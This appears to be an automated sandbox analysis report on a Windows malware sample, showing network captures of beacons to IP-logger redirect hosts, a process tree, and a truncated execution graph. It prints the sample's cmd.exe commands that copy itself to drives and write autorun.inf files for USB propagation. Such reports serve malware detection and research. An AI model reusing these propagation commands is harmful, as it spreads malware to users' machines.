    Set-Cookie: NID=513=H1RAwZMpbccP2MupfzVClLXvboj2k_4nyM1TDtjKSCFjsE7EiTXH9bwLa77-PG9rFOQLO1-g_QxGqzQ3X6qDivIZpRs6mZysq9oxrD3VPUUav5jdQzsmUXuWYf1dyfAzzncyChxc77K4MzSt1SRaCs54NHbaLRz1tZDj5AKJbP8; expires=Thu, 24-Oct-2024 08:54:29 GMT; path=/; domain=.googl
    Data Raw:
    Data Ascii:
Apr 24, 2024 10:54:30.264858007 CEST | 410 | IN | Data Raw: 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63
    Data Ascii: .com; HttpOnly<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://www.google.com/sorry/index?continue=http://google.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49709 | 142.250.141.104 | 80 | 5812 | C:\Users\user\Desktop\IPrstVM17M.exe

Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 10:54:30.606769085 CEST | 466 | OUT | GET /sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaVvZTgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
    User-Agent: MyApp
    Cache-Control: no-cache
    Connection: Keep-Alive
    Host: www.google.com
    Cookie: NID=513=H1RAwZMpbccP2MupfzVClLXvboj2k_4nyM1TDtjKSCFjsE7EiTXH9bwLa77-PG9rFOQLO1-g_QxGqzQ3X6qDivIZpRs6mZysq9oxrD3VPUUav5jdQzsmUXuWYf1dyfAzzncyChxc77K4MzSt1SRaCs54NHbaLRz1tZDj5AKJbP8
Apr 24, 2024 10:54:30.785361052 CEST | 1289 | IN | HTTP/1.1 429 Too Many Requests
    Date: Wed, 24 Apr 2024 08:54:30 GMT
    Pragma: no-cache
    Expires: Fri, 01 Jan 1990 00:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Content-Type: text/html
    Server: HTTP server (unknown)
    Content-Length: 3040
    X-XSS-Protection: 0
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 20 6f 76 65 72 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 63 6f 6e 74 61 69 6e 3b 22 20 6f 6e 6c 6f 61 64 3d 22 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 27 29 3b 69 66 28 65 29 7b 65 2e 66 6f 63 75 73 28 29 3b 7d 20 69 66 28 73 6f 6c 76 65 53 69 6d 70 6c 65 43 68 61 6c 6c 65 6e 67 65 29 20 7b 73 6f 6c 76 65 53 69 6d 70 6c 65 43 68 61 6c 6c 65 6e 67 65 28 2c 29 3b 7d 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 78 2d 77 69 64 74 68 3a 34 30 30 70 78 3b 22 3e 0a 3c 68 72 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 63 63 63 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 63 63 63 3b 22 3e 3c 62 72 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 63 61 70 74 63 68 61 2d 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 69 6e 64 65 78 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 
3c 6e 6f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 22 3e 0a 20 20 49 6e 20 6f 72 64 65 72 20 74 6f 20 63 6f 6e 74 69 6e 75 65 2c 20 70 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 6a 61 76 61 73 63 72 69 70 74 20 6f 6e 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 2e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 2e 6a 73 22 20 61 73 79 6e 63 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69
    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>http://google.com/</title></head><body style="font-family: arial, sans-serif; background-color: #fff; color: #000; padding:20px; font-size:18px; overscroll-behavior:contain;" onload="e=document.getElementById('captcha');if(e){e.focus();} if(solveSimpleChallenge) {solveSimpleChallenge(,);}"><div style="max-width:400px;"><hr noshade size="1" style="color:#ccc; background-color:#ccc;"><br><form id="captcha-form" action="index" method="post"><noscript><div style="font-size:13px;"> In order to continue, please enable javascript on your web browser.</div></noscript><script src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-si
Apr 24, 2024 10:54:30.785445929 CEST | 1289 | IN | Data Raw: 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61
    Data Ascii: tekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="NDjnEWnMhmQ7wp36fB9aNpIJjS16Od5UeG1lfKw723Xwto59B308DcfrxyU40W3A1n-eBn5KqiqSyJK22NWDn_9cgkFPyl_As3_SfyVaJpZcaQPzDnShi_p6jvm9artO4yp5XSO05P-Y9E063USkGhXF5bT
Apr 24, 2024 10:54:30.785481930 CEST | 742 | IN | Data Raw: 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e 67 20 74 68 65 20 61 62 6f 76 65 20 43 41 50 54 43 48 41
    Data Ascii: ire shortly after those requests stop. In the meantime, solving the above CAPTCHA will let you continue to use our services.<br><br>This traffic may have been sent by malicious software, a browser plug-in, or a script that sends automated req


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 52.173.151.229 | 443 | 5812 | C:\Users\user\Desktop\IPrstVM17M.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-24 08:54:25 UTC | 103 | OUT | GET /news.php?tid=JBB69H.jpg HTTP/1.1
    User-Agent: MyApp
    Host: stopify.co
    Cache-Control: no-cache
2024-04-24 08:54:26 UTC | 393 | IN | HTTP/1.1 302 Found
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=utf-8
    Date: Wed, 24 Apr 2024 08:54:26 GMT
    Server: Apache
    Location: https://grabify.world/news.php?tid=JBB69H.jpg
    Status: 301 Moved Permanently
    cf-cache-status: DYNAMIC
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    cf-ray: 56137e603e72eeba


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49706 | 172.67.161.186 | 443 | 5812 | C:\Users\user\Desktop\IPrstVM17M.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-24 08:54:26 UTC | 130 | OUT | GET /news.php?tid=JBB69H.jpg HTTP/1.1
    User-Agent: MyApp
    Cache-Control: no-cache
    Host: grabify.world
    Connection: Keep-Alive
2024-04-24 08:54:27 UTC | 732 | IN | HTTP/1.1 302 Moved Temporarily
    Date: Wed, 24 Apr 2024 08:54:27 GMT
    Content-Type: text/html
    Content-Length: 143
    Connection: close
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Location: https://grabify.link/news.php?tid=JBB69H.jpg
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8RRLSund%2BNlaFEd2qEGS%2Fw80oK8iiz133eoBwd8JgJTgroRrDRoHuoeVt3cxUKiNyY4C69DNMH%2BGz%2FigwhSStrQtZ4IznKPvxeOG44Nb09TughckWCWblLl2F35QPEiS"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8794de63eec27e76-LAX
    alt-svc: h3=":443"; ma=86400
2024-04-24 08:54:27 UTC | 143 | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49707 | 104.26.8.202 | 443 | 5812 | C:\Users\user\Desktop\IPrstVM17M.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-24 08:54:27 UTC | 129 | OUT | GET /news.php?tid=JBB69H.jpg HTTP/1.1
    User-Agent: MyApp
    Cache-Control: no-cache
    Connection: Keep-Alive
    Host: grabify.link
2024-04-24 08:54:29 UTC | 1273 | IN | HTTP/1.1 301 Moved Permanently
    Date: Wed, 24 Apr 2024 08:54:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Cache-Control: no-cache, private
    Location: http://google.com
    X-Robots-Tag: noindex, nofollow
    x-content-type-options: nosniff
    x-abuse: abuse@grabify.link
    X-RateLimit-Limit: 15
    X-RateLimit-Remaining: 14
    Set-Cookie: XSRF-TOKEN=eyJpdiI6InR4SHJiS01RNXhoeXBBdlA5cVNneXc9PSIsInZhbHVlIjoiRWM3MmRvRitIS3VETmI3U2JPR3diZm14aGVTYkF5eXo0bzM4RlhOeHZaSjIyc1ZNNkFhd0JiMWVrQTNCN0dLdFJjOEprTUw3b3lpcE9HeTNKdUVaeUh6UkNzUUUzN01Wa1AvU3NWZnJTS3dXVmpwNkVpOXlwMU5kWUVESDlzd3EiLCJtYWMiOiI0MTFkYTliZDJkM2QzNDQ0NzRkNmVlNjg2NGM5MTJhZWM3MzM5NzQ3M2UxMzYzZGNmZDk4YzU2ODFkMzdmOGZiIiwidGFnIjoiIn0%3D; expires=Wed, 24 Apr 2024 13:54:29 GMT; Max-Age=18000; path=/; secure
    Set-Cookie: g_session=eyJpdiI6Imw0VkRZNFRGWG5MNlRQYmI4KzVkMlE9PSIsInZhbHVlIjoiS2ZPalFRaVRSaDVGT1ZmQXhrZlNSVFcwZXlrd09ITEpiNk92UjUyZ0tnWFFhVCtMaHkxNXZNZU9sNjUrcXNkOU00UXo4OGJ5OG42RVdYM1NGbG9LenVhbWNWbmF3Q21MWFpBeVl5ZzFpUGZsQXZNWFA1amlRVnRtc015ekpYWFkiLCJtYWMiOiIxZTU1N2NjMTE5NjcwNjJiYTQxYTcwYjk4ZTE5YjhiNDEwNTk5YjY1OGYwM2U2MzQ2MTU1NDRiYjdmMjExODU2IiwidGFnIjoiIn0%3D; expires=Wed, 24 Apr 2024 13:54:29 GMT; Max-Age=18000; path=/; secure; httponly
    CF-Cache-Status: DYNAMIC
2024-04-24 08:54:29 UTC | 407 | IN | Data Raw:
    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MtUPwFAswrbKReyr4MA22Em4ctiMGjDIYPvovdMNYZgIOQIjUKr9po2zSKYfMBCJOyRytgcSWGrh%2FnRYsQjN%2FoWLdpnaj4Lfqpw7z05v%2B7KF7jToa0Py6z%2Bw2EsLNA%3D%3D"}],"group":"cf-nel","max_age":604800
2024-04-24 08:54:29 UTC | 272 | IN | Data Raw:
    Data Ascii: 109<!DOCTYPE html><html><head><meta charset="UTF-8" /><meta http-equiv="refresh" content="0;url='http://google.com'" /><title>Redirecting to http://google.com</title></head><body>Redirecting to <a href="http://google.com">http://google.com</a>.
2024-04-24 08:54:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0



Target ID: 0
Start time: 10:54:23
Start date: 24/04/2024
Path: C:\Users\user\Desktop\IPrstVM17M.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\IPrstVM17M.exe"
Imagebase: 0x200000
File size: 73'228 bytes
MD5 hash: A23B11E50C1F6FCDB42D3B2582524E2F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 1
Start time: 10:54:23
Start date: 24/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 3
Start time: 10:54:29
Start date: 24/04/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe"
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 10:54:30
Start date: 24/04/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" D:\bin.exe
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 10:54:30
Start date: 24/04/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 10:54:30
Start date: 24/04/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 10:54:30
Start date: 24/04/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" E:\bin.exe
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                    Target ID:8
                                                    Start time:10:54:30
                                                    Start date:24/04/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf
                                                    Imagebase:0x790000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:10:54:30
                                                    Start date:24/04/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf
                                                    Imagebase:0x790000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true


                                                      Execution Graph

                                                      Execution Coverage:35.2%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:78.5%
                                                      Total number of Nodes:1918
                                                      Total number of Limit Nodes:9
4869 207e40 11 API calls 4868->4869 4870 20538f 4869->4870 4871 207e40 11 API calls 4870->4871 4872 2053a3 4871->4872 4873 202240 92 API calls 4872->4873 4874 2053b8 4873->4874 4875 207df0 2 API calls 4874->4875 4876 2053c3 4875->4876 4877 207df0 2 API calls 4876->4877 4878 2053d2 Sleep 4877->4878 4879 207e40 11 API calls 4878->4879 4880 2053e6 4879->4880 4881 207e40 11 API calls 4880->4881 4882 2053fa 4881->4882 4883 202240 92 API calls 4882->4883 4884 20540f 4883->4884 4885 207df0 2 API calls 4884->4885 4886 20541a 4885->4886 4887 207df0 2 API calls 4886->4887 4888 205429 Sleep 4887->4888 4889 207e40 11 API calls 4888->4889 4890 20543d 4889->4890 4891 207e40 11 API calls 4890->4891 4892 205451 4891->4892 4893 202240 92 API calls 4892->4893 4894 205466 4893->4894 4895 207df0 2 API calls 4894->4895 4896 205471 4895->4896 4897 207df0 2 API calls 4896->4897 4898 205480 Sleep 4897->4898 4899 207e40 11 API calls 4898->4899 4900 205494 4899->4900 4901 207e40 11 API calls 4900->4901 4902 2054a8 4901->4902 4903 202240 92 API calls 4902->4903 4904 2054bd 4903->4904 4905 207df0 2 API calls 4904->4905 4906 2054c8 4905->4906 4907 207df0 2 API calls 4906->4907 4908 2054d7 Sleep 4907->4908 4909 207e40 11 API calls 4908->4909 4910 2054eb 4909->4910 4911 207e40 11 API calls 4910->4911 4912 2054ff 4911->4912 4913 202240 92 API calls 4912->4913 4914 205514 4913->4914 4915 207df0 2 API calls 4914->4915 4916 20551f 4915->4916 4917 207df0 2 API calls 4916->4917 4918 20552e Sleep 4917->4918 4919 207e40 11 API calls 4918->4919 4920 205542 4919->4920 4921 207e40 11 API calls 4920->4921 4922 205556 4921->4922 4923 202240 92 API calls 4922->4923 4924 20556b 4923->4924 4925 207df0 2 API calls 4924->4925 4926 205576 4925->4926 4927 207df0 2 API calls 4926->4927 4928 205585 Sleep 4927->4928 4929 207e40 11 API calls 4928->4929 4930 205599 4929->4930 4931 207e40 11 API calls 4930->4931 4932 2055ad 4931->4932 4933 202240 92 API calls 4932->4933 4934 2055c2 4933->4934 4935 207df0 2 API calls 
4934->4935 4936 2055cd 4935->4936 4937 207df0 2 API calls 4936->4937 4938 2055dc Sleep 4937->4938 4939 207e40 11 API calls 4938->4939 4940 2055f0 4939->4940 4941 207e40 11 API calls 4940->4941 4942 205604 4941->4942 4943 202240 92 API calls 4942->4943 4944 205619 4943->4944 4945 207df0 2 API calls 4944->4945 4946 205624 4945->4946 4947 207df0 2 API calls 4946->4947 4948 205633 Sleep 4947->4948 4949 207e40 11 API calls 4948->4949 4950 205647 4949->4950 4951 207e40 11 API calls 4950->4951 4952 20565b 4951->4952 4953 202240 92 API calls 4952->4953 4954 205670 4953->4954 4955 207df0 2 API calls 4954->4955 4956 20567b 4955->4956 4957 207df0 2 API calls 4956->4957 4958 20568a Sleep 4957->4958 4959 207e40 11 API calls 4958->4959 4960 20569e 4959->4960 4961 207e40 11 API calls 4960->4961 4962 2056b2 4961->4962 4963 202240 92 API calls 4962->4963 4964 2056c7 4963->4964 4965 207df0 2 API calls 4964->4965 4966 2056d2 4965->4966 4967 207df0 2 API calls 4966->4967 4968 2056e1 Sleep 4967->4968 4969 207e40 11 API calls 4968->4969 4970 2056f5 4969->4970 4971 207e40 11 API calls 4970->4971 4972 205709 4971->4972 4973 202240 92 API calls 4972->4973 4974 20571e 4973->4974 4975 207df0 2 API calls 4974->4975 4976 205729 4975->4976 4977 207df0 2 API calls 4976->4977 4978 205738 Sleep 4977->4978 4979 207e40 11 API calls 4978->4979 4980 20574c 4979->4980 4981 207e40 11 API calls 4980->4981 4982 205760 4981->4982 4983 202240 92 API calls 4982->4983 4984 205775 4983->4984 4985 207df0 2 API calls 4984->4985 4986 205780 4985->4986 4987 207df0 2 API calls 4986->4987 4988 20578f Sleep 4987->4988 4989 207e40 11 API calls 4988->4989 4990 2057a3 4989->4990 4991 207e40 11 API calls 4990->4991 4992 2057b7 4991->4992 4993 202240 92 API calls 4992->4993 4994 2057cc 4993->4994 4995 207df0 2 API calls 4994->4995 4996 2057d7 4995->4996 4997 207df0 2 API calls 4996->4997 4998 2057e6 Sleep 4997->4998 4999 207e40 11 API calls 4998->4999 5000 2057fa 4999->5000 5001 207e40 11 API calls 5000->5001 5002 20580e 
5001->5002 5003 202240 92 API calls 5002->5003 5004 205823 5003->5004 5005 207df0 2 API calls 5004->5005 5006 20582e 5005->5006 5007 207df0 2 API calls 5006->5007 5008 20583d Sleep 5007->5008 5009 207e40 11 API calls 5008->5009 5010 205851 5009->5010 5011 207e40 11 API calls 5010->5011 5012 205865 5011->5012 5013 202240 92 API calls 5012->5013 5014 20587a 5013->5014 5015 207df0 2 API calls 5014->5015 5016 205885 5015->5016 5017 207df0 2 API calls 5016->5017 5018 205894 Sleep 5017->5018 5019 207e40 11 API calls 5018->5019 5020 2058a8 5019->5020 5021 207e40 11 API calls 5020->5021 5022 2058bc 5021->5022 5023 202240 92 API calls 5022->5023 5024 2058d1 5023->5024 5025 207df0 2 API calls 5024->5025 5026 2058dc 5025->5026 5027 207df0 2 API calls 5026->5027 5028 2058eb Sleep 5027->5028 5029 207e40 11 API calls 5028->5029 5030 2058ff 5029->5030 5031 207e40 11 API calls 5030->5031 5032 205913 5031->5032 5033 202240 92 API calls 5032->5033 5034 205928 5033->5034 5035 207df0 2 API calls 5034->5035 5036 205933 5035->5036 5037 207df0 2 API calls 5036->5037 5038 205942 Sleep 5037->5038 5039 207e40 11 API calls 5038->5039 5040 205956 5039->5040 5041 207e40 11 API calls 5040->5041 5042 20596a 5041->5042 5043 202240 92 API calls 5042->5043 5044 20597f 5043->5044 5045 207df0 2 API calls 5044->5045 5046 20598a 5045->5046 5047 207df0 2 API calls 5046->5047 5048 205999 Sleep 5047->5048 5049 207e40 11 API calls 5048->5049 5050 2059ad 5049->5050 5051 207e40 11 API calls 5050->5051 5052 2059c1 5051->5052 5053 202240 92 API calls 5052->5053 5054 2059d6 5053->5054 5055 207df0 2 API calls 5054->5055 5056 2059e1 5055->5056 5057 207df0 2 API calls 5056->5057 5058 2059f0 Sleep 5057->5058 5059 207e40 11 API calls 5058->5059 5060 205a04 5059->5060 5061 207e40 11 API calls 5060->5061 5062 205a18 5061->5062 5063 202240 92 API calls 5062->5063 5064 205a2d 5063->5064 5065 207df0 2 API calls 5064->5065 5066 205a38 5065->5066 5067 207df0 2 API calls 5066->5067 5068 205a47 Sleep 5067->5068 5069 207e40 
11 API calls 5068->5069 5070 205a5b 5069->5070 5071 207e40 11 API calls 5070->5071 5072 205a6f 5071->5072 5073 202240 92 API calls 5072->5073 5074 205a84 5073->5074 5075 207df0 2 API calls 5074->5075 5076 205a8f 5075->5076 5077 207df0 2 API calls 5076->5077 5078 205a9e Sleep 5077->5078 5079 207e40 11 API calls 5078->5079 5080 205ab2 5079->5080 5081 207e40 11 API calls 5080->5081 5082 205ac6 5081->5082 5083 202240 92 API calls 5082->5083 5084 205adb 5083->5084 5085 207df0 2 API calls 5084->5085 5086 205ae6 5085->5086 5087 207df0 2 API calls 5086->5087 5088 205af5 Sleep 5087->5088 5089 207e40 11 API calls 5088->5089 5090 205b09 5089->5090 5091 207e40 11 API calls 5090->5091 5092 205b1d 5091->5092 5093 202240 92 API calls 5092->5093 5094 205b32 5093->5094 5095 207df0 2 API calls 5094->5095 5096 205b3d 5095->5096 5097 207df0 2 API calls 5096->5097 5098 205b4c Sleep 5097->5098 5099 207e40 11 API calls 5098->5099 5100 205b60 5099->5100 5101 207e40 11 API calls 5100->5101 5102 205b74 5101->5102 5103 202240 92 API calls 5102->5103 5104 205b89 5103->5104 5105 207df0 2 API calls 5104->5105 5106 205b94 5105->5106 5107 207df0 2 API calls 5106->5107 5108 205ba3 Sleep 5107->5108 5109 207e40 11 API calls 5108->5109 5110 205bb7 5109->5110 5111 207e40 11 API calls 5110->5111 5112 205bcb 5111->5112 5113 202240 92 API calls 5112->5113 5114 205be0 5113->5114 5115 207df0 2 API calls 5114->5115 5116 205beb 5115->5116 5117 207df0 2 API calls 5116->5117 5118 205bfa Sleep 5117->5118 5119 207e40 11 API calls 5118->5119 5120 205c0e 5119->5120 5121 207e40 11 API calls 5120->5121 5122 205c22 5121->5122 5123 202240 92 API calls 5122->5123 5124 205c37 5123->5124 5125 207df0 2 API calls 5124->5125 5126 205c42 5125->5126 5127 207df0 2 API calls 5126->5127 5128 205c51 Sleep 5127->5128 5129 207e40 11 API calls 5128->5129 5130 205c65 5129->5130 5131 207e40 11 API calls 5130->5131 5132 205c79 5131->5132 5133 202240 92 API calls 5132->5133 5134 205c8e 5133->5134 5135 207df0 2 API calls 5134->5135 5136 
